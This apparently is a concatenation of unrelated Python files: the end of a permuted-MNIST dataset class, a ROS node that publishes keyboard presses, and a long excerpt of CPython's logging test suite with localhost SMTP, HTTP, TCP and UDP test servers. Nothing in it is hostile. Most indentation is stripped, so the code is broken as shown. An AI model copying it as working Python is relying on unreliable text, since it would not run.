def _train_size(self):
return len(self._images)
def _test_data(self, idxs=slice(None)):
return np.random.rand(1, 224, 224, 3), np.zeros((1, 1))
def _test_size(self):
return 1
@property
def shape(self):
return (224, 224, 3)
@property
def output_size(self):
return self._output_size
class PixelByPixelMNIST(InMemoryDataset):
"""Transform MNIST into a sequence classification problem."""
def __init__(self, permutation_seed=0):
# Load the data
(x_train, y_train), (x_test, y_test) = mnist.load_data()
dims = np.prod(x_train.shape[1:])
# Generate the permutation
state = np.random.get_state()
np.random.seed(permutation_seed)
permutation = np.random.permutation(dims)
np.random.set_state(state)
# Permute, preprocess
x_train = x_train.reshape(-1, dims)[:, permutation, np.newaxis]
x_test = x_test.reshape(-1, dims)[:, permutation, np.newaxis]
x_train = x_train.astype(np.float32) / 255.
x_test = x_test.astype(np.float32) / 255.
super(PixelByPixelMNIST, self).__init__(
x_train,
y_train,
x_test,
y_test
)
|
keyboard_reader.py
|
#!/usr/bin/env python
import rospy
from std_msgs.msg import Int32
import curses
import threading
import time
pub = {}
lock = threading.Event()
def keyboard_listener(stdscr):
# don't wait for input when calling getch
stdscr.nodelay(1)
# hide the cursor
curses.curs_set(0)
stdscr.addstr('Reading keyboard... (Press Esc to exit)')
c = -1
while c != 27 and lock.isSet():
# get keyboard input, returns -1 if none available
c = stdscr.getch()
if c != -1:
# return cursor to start position
stdscr.move(1, 0)
# print numeric value
try:
stdscr.addstr('key: ' + chr(c) + ' ')
except:
stdscr.addstr('key: ?? ')
stdscr.move(2, 0)
stdscr.addstr(' id: ' + str(c) + ' ')
pub.publish(c)
stdscr.refresh()
def read_keyboard():
curses.wrapper(keyboard_listener)
if __name__ == '__main__':
# Init ROS
rospy.init_node('read_keyboard')
# Clear the lock when a shutdown request is received
rospy.on_shutdown(lock.clear)
# Init publisher
pub = rospy.Publisher('keyboard', Int32, queue_size=10)
# Read keyboard
try:
lock.set()
t = threading.Thread(target=read_keyboard)
t.start()
except KeyboardInterrupt:
lock.clear()
except rospy.ROSInterruptException:
lock.clear()
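# Illustrative companion sketch (not part of this node): the key codes published on
# the 'keyboard' topic can be consumed from any other ROS node, for example:
#
#   >>> import rospy
#   >>> from std_msgs.msg import Int32
#   >>> rospy.init_node('keyboard_echo')
#   >>> rospy.Subscriber('keyboard', Int32, lambda msg: rospy.loginfo(msg.data))
#   >>> rospy.spin()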
|
test_logging.py
|
# Copyright 2001-2014 by Vinay Sajip. All Rights Reserved.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose and without fee is hereby granted,
# provided that the above copyright notice appear in all copies and that
# both that copyright notice and this permission notice appear in
# supporting documentation, and that the name of Vinay Sajip
# not be used in advertising or publicity pertaining to distribution
# of the software without specific, written prior permission.
# VINAY SAJIP DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE, INCLUDING
# ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL
# VINAY SAJIP BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR
# ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER
# IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
"""Test harness for the logging module. Run all tests.
Copyright (C) 2001-2014 Vinay Sajip. All Rights Reserved.
"""
import logging
import logging.handlers
import logging.config
import codecs
import configparser
import datetime
import pathlib
import pickle
import io
import gc
import json
import os
import queue
import random
import re
import socket
import struct
import sys
import tempfile
from test.support.script_helper import assert_python_ok
from test import support
import textwrap
import time
import unittest
import warnings
import weakref
try:
import threading
# The following imports are needed only for tests which
# require threading
import asyncore
from http.server import HTTPServer, BaseHTTPRequestHandler
import smtpd
from urllib.parse import urlparse, parse_qs
from socketserver import (ThreadingUDPServer, DatagramRequestHandler,
ThreadingTCPServer, StreamRequestHandler)
except ImportError:
threading = None
try:
import win32evtlog, win32evtlogutil, pywintypes
except ImportError:
win32evtlog = win32evtlogutil = pywintypes = None
try:
import zlib
except ImportError:
pass
class BaseTest(unittest.TestCase):
"""Base class for logging tests."""
log_format = "%(name)s -> %(levelname)s: %(message)s"
expected_log_pat = r"^([\w.]+) -> (\w+): (\d+)$"
message_num = 0
def setUp(self):
"""Setup the default logging stream to an internal StringIO instance,
so that we can examine log output as we want."""
logger_dict = logging.getLogger().manager.loggerDict
logging._acquireLock()
try:
self.saved_handlers = logging._handlers.copy()
self.saved_handler_list = logging._handlerList[:]
self.saved_loggers = saved_loggers = logger_dict.copy()
self.saved_name_to_level = logging._nameToLevel.copy()
self.saved_level_to_name = logging._levelToName.copy()
self.logger_states = logger_states = {}
for name in saved_loggers:
logger_states[name] = getattr(saved_loggers[name],
'disabled', None)
finally:
logging._releaseLock()
# Set two unused loggers
self.logger1 = logging.getLogger("\xab\xd7\xbb")
self.logger2 = logging.getLogger("\u013f\u00d6\u0047")
self.root_logger = logging.getLogger("")
self.original_logging_level = self.root_logger.getEffectiveLevel()
self.stream = io.StringIO()
self.root_logger.setLevel(logging.DEBUG)
self.root_hdlr = logging.StreamHandler(self.stream)
self.root_formatter = logging.Formatter(self.log_format)
self.root_hdlr.setFormatter(self.root_formatter)
if self.logger1.hasHandlers():
hlist = self.logger1.handlers + self.root_logger.handlers
raise AssertionError('Unexpected handlers: %s' % hlist)
if self.logger2.hasHandlers():
hlist = self.logger2.handlers + self.root_logger.handlers
raise AssertionError('Unexpected handlers: %s' % hlist)
self.root_logger.addHandler(self.root_hdlr)
self.assertTrue(self.logger1.hasHandlers())
self.assertTrue(self.logger2.hasHandlers())
def tearDown(self):
"""Remove our logging stream, and restore the original logging
level."""
self.stream.close()
self.root_logger.removeHandler(self.root_hdlr)
while self.root_logger.handlers:
h = self.root_logger.handlers[0]
self.root_logger.removeHandler(h)
h.close()
self.root_logger.setLevel(self.original_logging_level)
logging._acquireLock()
try:
logging._levelToName.clear()
logging._levelToName.update(self.saved_level_to_name)
logging._nameToLevel.clear()
logging._nameToLevel.update(self.saved_name_to_level)
logging._handlers.clear()
logging._handlers.update(self.saved_handlers)
logging._handlerList[:] = self.saved_handler_list
loggerDict = logging.getLogger().manager.loggerDict
loggerDict.clear()
loggerDict.update(self.saved_loggers)
logger_states = self.logger_states
for name in self.logger_states:
if logger_states[name] is not None:
self.saved_loggers[name].disabled = logger_states[name]
finally:
logging._releaseLock()
def assert_log_lines(self, expected_values, stream=None, pat=None):
"""Match the collected log lines against the regular expression
self.expected_log_pat, and compare the extracted group values to
the expected_values list of tuples."""
stream = stream or self.stream
pat = re.compile(pat or self.expected_log_pat)
actual_lines = stream.getvalue().splitlines()
self.assertEqual(len(actual_lines), len(expected_values))
for actual, expected in zip(actual_lines, expected_values):
match = pat.search(actual)
if not match:
self.fail("Log line does not match expected pattern:\n" +
actual)
self.assertEqual(tuple(match.groups()), expected)
s = stream.read()
if s:
self.fail("Remaining output at end of log stream:\n" + s)
def next_message(self):
"""Generate a message consisting solely of an auto-incrementing
integer."""
self.message_num += 1
return "%d" % self.message_num
class BuiltinLevelsTest(BaseTest):
"""Test builtin levels and their inheritance."""
def test_flat(self):
#Logging levels in a flat logger namespace.
m = self.next_message
ERR = logging.getLogger("ERR")
ERR.setLevel(logging.ERROR)
INF = logging.LoggerAdapter(logging.getLogger("INF"), {})
INF.setLevel(logging.INFO)
DEB = logging.getLogger("DEB")
DEB.setLevel(logging.DEBUG)
# These should log.
ERR.log(logging.CRITICAL, m())
ERR.error(m())
INF.log(logging.CRITICAL, m())
INF.error(m())
INF.warning(m())
INF.info(m())
DEB.log(logging.CRITICAL, m())
DEB.error(m())
DEB.warning(m())
DEB.info(m())
DEB.debug(m())
# These should not log.
ERR.warning(m())
ERR.info(m())
ERR.debug(m())
INF.debug(m())
self.assert_log_lines([
('ERR', 'CRITICAL', '1'),
('ERR', 'ERROR', '2'),
('INF', 'CRITICAL', '3'),
('INF', 'ERROR', '4'),
('INF', 'WARNING', '5'),
('INF', 'INFO', '6'),
('DEB', 'CRITICAL', '7'),
('DEB', 'ERROR', '8'),
('DEB', 'WARNING', '9'),
('DEB', 'INFO', '10'),
('DEB', 'DEBUG', '11'),
])
def test_nested_explicit(self):
# Logging levels in a nested namespace, all explicitly set.
m = self.next_message
INF = logging.getLogger("INF")
INF.setLevel(logging.INFO)
INF_ERR = logging.getLogger("INF.ERR")
INF_ERR.setLevel(logging.ERROR)
# These should log.
INF_ERR.log(logging.CRITICAL, m())
INF_ERR.error(m())
# These should not log.
INF_ERR.warning(m())
INF_ERR.info(m())
INF_ERR.debug(m())
self.assert_log_lines([
('INF.ERR', 'CRITICAL', '1'),
('INF.ERR', 'ERROR', '2'),
])
def test_nested_inherited(self):
#Logging levels in a nested namespace, inherited from parent loggers.
m = self.next_message
INF = logging.getLogger("INF")
INF.setLevel(logging.INFO)
INF_ERR = logging.getLogger("INF.ERR")
INF_ERR.setLevel(logging.ERROR)
INF_UNDEF = logging.getLogger("INF.UNDEF")
INF_ERR_UNDEF = logging.getLogger("INF.ERR.UNDEF")
UNDEF = logging.getLogger("UNDEF")
# These should log.
INF_UNDEF.log(logging.CRITICAL, m())
INF_UNDEF.error(m())
INF_UNDEF.warning(m())
INF_UNDEF.info(m())
INF_ERR_UNDEF.log(logging.CRITICAL, m())
INF_ERR_UNDEF.error(m())
# These should not log.
INF_UNDEF.debug(m())
INF_ERR_UNDEF.warning(m())
INF_ERR_UNDEF.info(m())
INF_ERR_UNDEF.debug(m())
self.assert_log_lines([
('INF.UNDEF', 'CRITICAL', '1'),
('INF.UNDEF', 'ERROR', '2'),
('INF.UNDEF', 'WARNING', '3'),
('INF.UNDEF', 'INFO', '4'),
('INF.ERR.UNDEF', 'CRITICAL', '5'),
('INF.ERR.UNDEF', 'ERROR', '6'),
])
def test_nested_with_virtual_parent(self):
# Logging levels when some parent does not exist yet.
m = self.next_message
INF = logging.getLogger("INF")
GRANDCHILD = logging.getLogger("INF.BADPARENT.UNDEF")
CHILD = logging.getLogger("INF.BADPARENT")
INF.setLevel(logging.INFO)
# These should log.
GRANDCHILD.log(logging.FATAL, m())
GRANDCHILD.info(m())
CHILD.log(logging.FATAL, m())
CHILD.info(m())
# These should not log.
GRANDCHILD.debug(m())
CHILD.debug(m())
self.assert_log_lines([
('INF.BADPARENT.UNDEF', 'CRITICAL', '1'),
('INF.BADPARENT.UNDEF', 'INFO', '2'),
('INF.BADPARENT', 'CRITICAL', '3'),
('INF.BADPARENT', 'INFO', '4'),
])
def test_regression_22386(self):
"""See issue #22386 for more information."""
self.assertEqual(logging.getLevelName('INFO'), logging.INFO)
self.assertEqual(logging.getLevelName(logging.INFO), 'INFO')
class BasicFilterTest(BaseTest):
"""Test the bundled Filter class."""
def test_filter(self):
# Only messages satisfying the specified criteria pass through the
# filter.
filter_ = logging.Filter("spam.eggs")
handler = self.root_logger.handlers[0]
try:
handler.addFilter(filter_)
spam = logging.getLogger("spam")
spam_eggs = logging.getLogger("spam.eggs")
spam_eggs_fish = logging.getLogger("spam.eggs.fish")
spam_bakedbeans = logging.getLogger("spam.bakedbeans")
spam.info(self.next_message())
spam_eggs.info(self.next_message()) # Good.
spam_eggs_fish.info(self.next_message()) # Good.
spam_bakedbeans.info(self.next_message())
self.assert_log_lines([
('spam.eggs', 'INFO', '2'),
('spam.eggs.fish', 'INFO', '3'),
])
finally:
handler.removeFilter(filter_)
def test_callable_filter(self):
# Only messages satisfying the specified criteria pass through the
# filter.
def filterfunc(record):
parts = record.name.split('.')
prefix = '.'.join(parts[:2])
return prefix == 'spam.eggs'
handler = self.root_logger.handlers[0]
try:
handler.addFilter(filterfunc)
spam = logging.getLogger("spam")
spam_eggs = logging.getLogger("spam.eggs")
spam_eggs_fish = logging.getLogger("spam.eggs.fish")
spam_bakedbeans = logging.getLogger("spam.bakedbeans")
spam.info(self.next_message())
spam_eggs.info(self.next_message()) # Good.
spam_eggs_fish.info(self.next_message()) # Good.
spam_bakedbeans.info(self.next_message())
self.assert_log_lines([
('spam.eggs', 'INFO', '2'),
('spam.eggs.fish', 'INFO', '3'),
])
finally:
handler.removeFilter(filterfunc)
def test_empty_filter(self):
f = logging.Filter()
r = logging.makeLogRecord({'name': 'spam.eggs'})
self.assertTrue(f.filter(r))
#
# First, we define our levels. There can be as many as you want - the only
# limitations are that they should be integers, the lowest should be > 0 and
# larger values mean less information being logged. If you need specific
# level values which do not fit into these limitations, you can use a
# mapping dictionary to convert between your application levels and the
# logging system.
#
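# For instance (an illustrative sketch, not used by the tests below), an application
# with its own verbosity scale could translate it through such a mapping:
#   app_levels = {"quiet": 120, "normal": 116, "debugging": 111}
#   logger.log(app_levels[chosen_verbosity], "message")
#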
SILENT = 120
TACITURN = 119
TERSE = 118
EFFUSIVE = 117
SOCIABLE = 116
VERBOSE = 115
TALKATIVE = 114
GARRULOUS = 113
CHATTERBOX = 112
BORING = 111
LEVEL_RANGE = range(BORING, SILENT + 1)
#
# Next, we define names for our levels. You don't need to do this - in which
# case the system will use "Level n" to denote the text for the level.
#
my_logging_levels = {
SILENT : 'Silent',
TACITURN : 'Taciturn',
TERSE : 'Terse',
EFFUSIVE : 'Effusive',
SOCIABLE : 'Sociable',
VERBOSE : 'Verbose',
TALKATIVE : 'Talkative',
GARRULOUS : 'Garrulous',
CHATTERBOX : 'Chatterbox',
BORING : 'Boring',
}
class GarrulousFilter(logging.Filter):
"""A filter which blocks garrulous messages."""
def filter(self, record):
return record.levelno != GARRULOUS
class VerySpecificFilter(logging.Filter):
"""A filter which blocks sociable and taciturn messages."""
def filter(self, record):
return record.levelno not in [SOCIABLE, TACITURN]
class CustomLevelsAndFiltersTest(BaseTest):
"""Test various filtering possibilities with custom logging levels."""
# Skip the logger name group.
expected_log_pat = r"^[\w.]+ -> (\w+): (\d+)$"
def setUp(self):
BaseTest.setUp(self)
for k, v in my_logging_levels.items():
logging.addLevelName(k, v)
def log_at_all_levels(self, logger):
for lvl in LEVEL_RANGE:
logger.log(lvl, self.next_message())
def test_logger_filter(self):
# Filter at logger level.
self.root_logger.setLevel(VERBOSE)
# Levels >= 'Verbose' are good.
self.log_at_all_levels(self.root_logger)
self.assert_log_lines([
('Verbose', '5'),
('Sociable', '6'),
('Effusive', '7'),
('Terse', '8'),
('Taciturn', '9'),
('Silent', '10'),
])
def test_handler_filter(self):
# Filter at handler level.
self.root_logger.handlers[0].setLevel(SOCIABLE)
try:
# Levels >= 'Sociable' are good.
self.log_at_all_levels(self.root_logger)
self.assert_log_lines([
('Sociable', '6'),
('Effusive', '7'),
('Terse', '8'),
('Taciturn', '9'),
('Silent', '10'),
])
finally:
self.root_logger.handlers[0].setLevel(logging.NOTSET)
def test_specific_filters(self):
# Set a specific filter object on the handler, and then add another
# filter object on the logger itself.
handler = self.root_logger.handlers[0]
specific_filter = None
garr = GarrulousFilter()
handler.addFilter(garr)
try:
self.log_at_all_levels(self.root_logger)
first_lines = [
# Notice how 'Garrulous' is missing
('Boring', '1'),
('Chatterbox', '2'),
('Talkative', '4'),
('Verbose', '5'),
('Sociable', '6'),
('Effusive', '7'),
('Terse', '8'),
('Taciturn', '9'),
('Silent', '10'),
]
self.assert_log_lines(first_lines)
specific_filter = VerySpecificFilter()
self.root_logger.addFilter(specific_filter)
self.log_at_all_levels(self.root_logger)
self.assert_log_lines(first_lines + [
# Not only 'Garrulous' is still missing, but also 'Sociable'
# and 'Taciturn'
('Boring', '11'),
('Chatterbox', '12'),
('Talkative', '14'),
('Verbose', '15'),
('Effusive', '17'),
('Terse', '18'),
('Silent', '20'),
])
finally:
if specific_filter:
self.root_logger.removeFilter(specific_filter)
handler.removeFilter(garr)
class HandlerTest(BaseTest):
def test_name(self):
h = logging.Handler()
h.name = 'generic'
self.assertEqual(h.name, 'generic')
h.name = 'anothergeneric'
self.assertEqual(h.name, 'anothergeneric')
self.assertRaises(NotImplementedError, h.emit, None)
def test_builtin_handlers(self):
# We can't actually *use* too many handlers in the tests,
# but we can try instantiating them with various options
if sys.platform in ('linux', 'darwin'):
for existing in (True, False):
fd, fn = tempfile.mkstemp()
os.close(fd)
if not existing:
os.unlink(fn)
h = logging.handlers.WatchedFileHandler(fn, delay=True)
if existing:
dev, ino = h.dev, h.ino
self.assertEqual(dev, -1)
self.assertEqual(ino, -1)
r = logging.makeLogRecord({'msg': 'Test'})
h.handle(r)
# Now remove the file.
os.unlink(fn)
self.assertFalse(os.path.exists(fn))
# The next call should recreate the file.
h.handle(r)
self.assertTrue(os.path.exists(fn))
else:
self.assertEqual(h.dev, -1)
self.assertEqual(h.ino, -1)
h.close()
if existing:
os.unlink(fn)
if sys.platform == 'darwin':
sockname = '/var/run/syslog'
else:
sockname = '/dev/log'
try:
h = logging.handlers.SysLogHandler(sockname)
self.assertEqual(h.facility, h.LOG_USER)
self.assertTrue(h.unixsocket)
h.close()
except OSError: # syslogd might not be available
pass
for method in ('GET', 'POST', 'PUT'):
if method == 'PUT':
self.assertRaises(ValueError, logging.handlers.HTTPHandler,
'localhost', '/log', method)
else:
h = logging.handlers.HTTPHandler('localhost', '/log', method)
h.close()
h = logging.handlers.BufferingHandler(0)
r = logging.makeLogRecord({})
self.assertTrue(h.shouldFlush(r))
h.close()
h = logging.handlers.BufferingHandler(1)
self.assertFalse(h.shouldFlush(r))
h.close()
def test_path_objects(self):
"""
Test that Path objects are accepted as filename arguments to handlers.
See Issue #27493.
"""
fd, fn = tempfile.mkstemp()
os.close(fd)
os.unlink(fn)
pfn = pathlib.Path(fn)
cases = (
(logging.FileHandler, (pfn, 'w')),
(logging.handlers.RotatingFileHandler, (pfn, 'a')),
(logging.handlers.TimedRotatingFileHandler, (pfn, 'h')),
)
if sys.platform in ('linux', 'darwin'):
cases += ((logging.handlers.WatchedFileHandler, (pfn, 'w')),)
for cls, args in cases:
h = cls(*args)
self.assertTrue(os.path.exists(fn))
h.close()
os.unlink(fn)
@unittest.skipIf(os.name == 'nt', 'WatchedFileHandler not appropriate for Windows.')
@unittest.skipUnless(threading, 'Threading required for this test.')
def test_race(self):
# Issue #14632 refers.
def remove_loop(fname, tries):
for _ in range(tries):
try:
os.unlink(fname)
self.deletion_time = time.time()
except OSError:
pass
time.sleep(0.004 * random.randint(0, 4))
del_count = 500
log_count = 500
self.handle_time = None
self.deletion_time = None
for delay in (False, True):
fd, fn = tempfile.mkstemp('.log', 'test_logging-3-')
os.close(fd)
remover = threading.Thread(target=remove_loop, args=(fn, del_count))
remover.daemon = True
remover.start()
h = logging.handlers.WatchedFileHandler(fn, delay=delay)
f = logging.Formatter('%(asctime)s: %(levelname)s: %(message)s')
h.setFormatter(f)
try:
for _ in range(log_count):
time.sleep(0.005)
r = logging.makeLogRecord({'msg': 'testing' })
try:
self.handle_time = time.time()
h.handle(r)
except Exception:
print('Deleted at %s, '
'opened at %s' % (self.deletion_time,
self.handle_time))
raise
finally:
remover.join()
h.close()
if os.path.exists(fn):
os.unlink(fn)
class BadStream(object):
def write(self, data):
raise RuntimeError('deliberate mistake')
class TestStreamHandler(logging.StreamHandler):
def handleError(self, record):
self.error_record = record
class StreamHandlerTest(BaseTest):
def test_error_handling(self):
h = TestStreamHandler(BadStream())
r = logging.makeLogRecord({})
old_raise = logging.raiseExceptions
try:
h.handle(r)
self.assertIs(h.error_record, r)
h = logging.StreamHandler(BadStream())
with support.captured_stderr() as stderr:
h.handle(r)
msg = '\nRuntimeError: deliberate mistake\n'
self.assertIn(msg, stderr.getvalue())
logging.raiseExceptions = False
with support.captured_stderr() as stderr:
h.handle(r)
self.assertEqual('', stderr.getvalue())
finally:
logging.raiseExceptions = old_raise
# -- The following section could be moved into a server_helper.py module
# -- if it proves to be of wider utility than just test_logging
if threading:
class TestSMTPServer(smtpd.SMTPServer):
"""
This class implements a test SMTP server.
:param addr: A (host, port) tuple which the server listens on.
You can specify a port value of zero: the server's
*port* attribute will hold the actual port number
used, which can be used in client connections.
:param handler: A callable which will be called to process
incoming messages. The handler will be passed
the client address tuple, who the message is from,
a list of recipients and the message data.
:param poll_interval: The interval, in seconds, used in the underlying
:func:`select` or :func:`poll` call by
:func:`asyncore.loop`.
:param sockmap: A dictionary which will be used to hold
:class:`asyncore.dispatcher` instances used by
:func:`asyncore.loop`. This avoids changing the
:mod:`asyncore` module's global state.
"""
def __init__(self, addr, handler, poll_interval, sockmap):
smtpd.SMTPServer.__init__(self, addr, None, map=sockmap,
decode_data=True)
self.port = self.socket.getsockname()[1]
self._handler = handler
self._thread = None
self.poll_interval = poll_interval
def process_message(self, peer, mailfrom, rcpttos, data):
"""
Delegates to the handler passed in to the server's constructor.
Typically, this will be a test case method.
:param peer: The client (host, port) tuple.
:param mailfrom: The address of the sender.
:param rcpttos: The addresses of the recipients.
:param data: The message.
"""
self._handler(peer, mailfrom, rcpttos, data)
def start(self):
"""
Start the server running on a separate daemon thread.
"""
self._thread = t = threading.Thread(target=self.serve_forever,
args=(self.poll_interval,))
t.setDaemon(True)
t.start()
def serve_forever(self, poll_interval):
"""
Run the :mod:`asyncore` loop until normal termination
conditions arise.
:param poll_interval: The interval, in seconds, used in the underlying
:func:`select` or :func:`poll` call by
:func:`asyncore.loop`.
"""
try:
asyncore.loop(poll_interval, map=self._map)
except OSError:
# On FreeBSD 8, closing the server repeatedly
# raises this error. We swallow it if the
# server has been closed.
if self.connected or self.accepting:
raise
def stop(self, timeout=None):
"""
Stop the thread by closing the server instance.
Wait for the server thread to terminate.
:param timeout: How long to wait for the server thread
to terminate.
"""
self.close()
self._thread.join(timeout)
self._thread = None
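# Illustrative sketch (an assumption, not part of the test suite; the _example_* name is
# hypothetical and the function is never called): pairing TestSMTPServer with
# logging.handlers.SMTPHandler. SMTPHandlerTest below does the same thing with proper
# synchronisation on a threading.Event instead of relying on timing.
def _example_smtp_roundtrip():
    received = []
    sockmap = {}
    server = TestSMTPServer(('localhost', 0), lambda *args: received.append(args),
                            0.001, sockmap)
    server.start()
    handler = logging.handlers.SMTPHandler(('localhost', server.port),
                                           'from@example.com', ['to@example.com'],
                                           'Log', timeout=5.0)
    # handle() delivers the record over SMTP; the server thread then calls
    # process_message, which appends (peer, mailfrom, rcpttos, data) to `received`.
    handler.handle(logging.makeLogRecord({'msg': 'hello'}))
    handler.close()
    server.stop(5.0)
    return received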
class ControlMixin(object):
"""
This mixin is used to start a server on a separate thread, and
shut it down programmatically. Request handling is simplified - instead
of needing to derive a suitable RequestHandler subclass, you just
provide a callable which will be passed each received request to be
processed.
:param handler: A handler callable which will be called with a
single parameter - the request - in order to
process the request. This handler is called on the
server thread, effectively meaning that requests are
processed serially. While not quite Web scale ;-),
this should be fine for testing applications.
:param poll_interval: The polling interval in seconds.
"""
def __init__(self, handler, poll_interval):
self._thread = None
self.poll_interval = poll_interval
self._handler = handler
self.ready = threading.Event()
def start(self):
"""
Create a daemon thread to run the server, and start it.
"""
self._thread = t = threading.Thread(target=self.serve_forever,
args=(self.poll_interval,))
t.daemon = True
t.start()
def serve_forever(self, poll_interval):
"""
Run the server. Set the ready flag before entering the
service loop.
"""
self.ready.set()
super(ControlMixin, self).serve_forever(poll_interval)
def stop(self, timeout=None):
"""
Tell the server thread to stop, and wait for it to do so.
:param timeout: How long to wait for the server thread
to terminate.
"""
self.shutdown()
if self._thread is not None:
self._thread.join(timeout)
self._thread = None
self.server_close()
self.ready.clear()
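# Usage note (added): ControlMixin is meant to be combined with a socketserver class via
# cooperative multiple inheritance, e.g. `class TestTCPServer(ControlMixin, ThreadingTCPServer)`.
# The concrete TestHTTPServer, TestTCPServer and TestUDPServer classes below all follow that
# pattern: the socketserver base is initialised first, then ControlMixin.__init__ records the
# handler callable and poll interval used by start()/serve_forever()/stop().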
class TestHTTPServer(ControlMixin, HTTPServer):
"""
An HTTP server which is controllable using :class:`ControlMixin`.
:param addr: A tuple with the IP address and port to listen on.
:param handler: A handler callable which will be called with a
single parameter - the request - in order to
process the request.
:param poll_interval: The polling interval in seconds.
:param log: Pass ``True`` to enable log messages.
"""
def __init__(self, addr, handler, poll_interval=0.5,
log=False, sslctx=None):
class DelegatingHTTPRequestHandler(BaseHTTPRequestHandler):
def __getattr__(self, name):
if name.startswith('do_'):
return self.process_request
raise AttributeError(name)
def process_request(self):
self.server._handler(self)
def log_message(self, format, *args):
if log:
super(DelegatingHTTPRequestHandler,
self).log_message(format, *args)
HTTPServer.__init__(self, addr, DelegatingHTTPRequestHandler)
ControlMixin.__init__(self, handler, poll_interval)
self.sslctx = sslctx
def get_request(self):
try:
sock, addr = self.socket.accept()
if self.sslctx:
sock = self.sslctx.wrap_socket(sock, server_side=True)
except OSError as e:
# socket errors are silenced by the caller, print them here
sys.stderr.write("Got an error:\n%s\n" % e)
raise
return sock, addr
class TestTCPServer(ControlMixin, ThreadingTCPServer):
"""
A TCP server which is controllable using :class:`ControlMixin`.
:param addr: A tuple with the IP address and port to listen on.
:param handler: A handler callable which will be called with a single
parameter - the request - in order to process the request.
:param poll_interval: The polling interval in seconds.
:param bind_and_activate: If True (the default), binds the server and starts it
listening. If False, you need to call
:meth:`server_bind` and :meth:`server_activate` at
some later time before calling :meth:`start`, so that
the server will set up the socket and listen on it.
"""
allow_reuse_address = True
def __init__(self, addr, handler, poll_interval=0.5,
bind_and_activate=True):
class DelegatingTCPRequestHandler(StreamRequestHandler):
def handle(self):
self.server._handler(self)
ThreadingTCPServer.__init__(self, addr, DelegatingTCPRequestHandler,
bind_and_activate)
ControlMixin.__init__(self, handler, poll_interval)
def server_bind(self):
super(TestTCPServer, self).server_bind()
self.port = self.socket.getsockname()[1]
class TestUDPServer(ControlMixin, ThreadingUDPServer):
"""
A UDP server which is controllable using :class:`ControlMixin`.
:param addr: A tuple with the IP address and port to listen on.
:param handler: A handler callable which will be called with a
single parameter - the request - in order to
process the request.
:param poll_interval: The polling interval for shutdown requests,
in seconds.
:param bind_and_activate: If True (the default), binds the server and
starts it listening. If False, you need to
call :meth:`server_bind` and
:meth:`server_activate` at some later time
before calling :meth:`start`, so that the server will
set up the socket and listen on it.
"""
def __init__(self, addr, handler, poll_interval=0.5,
bind_and_activate=True):
class DelegatingUDPRequestHandler(DatagramRequestHandler):
def handle(self):
self.server._handler(self)
def finish(self):
data = self.wfile.getvalue()
if data:
try:
super(DelegatingUDPRequestHandler, self).finish()
except OSError:
if not self.server._closed:
raise
ThreadingUDPServer.__init__(self, addr,
DelegatingUDPRequestHandler,
bind_and_activate)
ControlMixin.__init__(self, handler, poll_interval)
self._closed = False
def server_bind(self):
super(TestUDPServer, self).server_bind()
self.port = self.socket.getsockname()[1]
def server_close(self):
super(TestUDPServer, self).server_close()
self._closed = True
if hasattr(socket, "AF_UNIX"):
class TestUnixStreamServer(TestTCPServer):
address_family = socket.AF_UNIX
class TestUnixDatagramServer(TestUDPServer):
address_family = socket.AF_UNIX
# - end of server_helper section
@unittest.skipUnless(threading, 'Threading required for this test.')
class SMTPHandlerTest(BaseTest):
TIMEOUT = 8.0
def test_basic(self):
sockmap = {}
server = TestSMTPServer((support.HOST, 0), self.process_message, 0.001,
sockmap)
server.start()
addr = (support.HOST, server.port)
h = logging.handlers.SMTPHandler(addr, 'me', 'you', 'Log',
timeout=self.TIMEOUT)
self.assertEqual(h.toaddrs, ['you'])
self.messages = []
r = logging.makeLogRecord({'msg': 'Hello \u2713'})
self.handled = threading.Event()
h.handle(r)
self.handled.wait(self.TIMEOUT) # 14314: don't wait forever
server.stop()
self.assertTrue(self.handled.is_set())
self.assertEqual(len(self.messages), 1)
peer, mailfrom, rcpttos, data = self.messages[0]
self.assertEqual(mailfrom, 'me')
self.assertEqual(rcpttos, ['you'])
self.assertIn('\nSubject: Log\n', data)
self.assertTrue(data.endswith('\n\nHello \u2713'))
h.close()
def process_message(self, *args):
self.messages.append(args)
self.handled.set()
class MemoryHandlerTest(BaseTest):
"""Tests for the MemoryHandler."""
# Do not bother with a logger name group.
expected_log_pat = r"^[\w.]+ -> (\w+): (\d+)$"
def setUp(self):
BaseTest.setUp(self)
self.mem_hdlr = logging.handlers.MemoryHandler(10, logging.WARNING,
self.root_hdlr)
self.mem_logger = logging.getLogger('mem')
self.mem_logger.propagate = 0
self.mem_logger.addHandler(self.mem_hdlr)
def tearDown(self):
self.mem_hdlr.close()
BaseTest.tearDown(self)
def test_flush(self):
# The memory handler flushes to its target handler based on specific
# criteria (message count and message level).
self.mem_logger.debug(self.next_message())
self.assert_log_lines([])
self.mem_logger.info(self.next_message())
self.assert_log_lines([])
# This will flush because the level is >= logging.WARNING
self.mem_logger.warning(self.next_message())
lines = [
('DEBUG', '1'),
('INFO', '2'),
('WARNING', '3'),
]
self.assert_log_lines(lines)
for n in (4, 14):
for i in range(9):
self.mem_logger.debug(self.next_message())
self.assert_log_lines(lines)
# This will flush because it's the 10th message since the last
# flush.
self.mem_logger.debug(self.next_message())
lines = lines + [('DEBUG', str(i)) for i in range(n, n + 10)]
self.assert_log_lines(lines)
self.mem_logger.debug(self.next_message())
self.assert_log_lines(lines)
def test_flush_on_close(self):
"""
Test that the flush-on-close configuration works as expected.
"""
self.mem_logger.debug(self.next_message())
self.assert_log_lines([])
self.mem_logger.info(self.next_message())
self.assert_log_lines([])
self.mem_logger.removeHandler(self.mem_hdlr)
# Default behaviour is to flush on close. Check that it happens.
self.mem_hdlr.close()
lines = [
('DEBUG', '1'),
('INFO', '2'),
]
self.assert_log_lines(lines)
# Now configure for flushing not to be done on close.
self.mem_hdlr = logging.handlers.MemoryHandler(10, logging.WARNING,
self.root_hdlr,
False)
self.mem_logger.addHandler(self.mem_hdlr)
self.mem_logger.debug(self.next_message())
self.assert_log_lines(lines) # no change
self.mem_logger.info(self.next_message())
self.assert_log_lines(lines) # no change
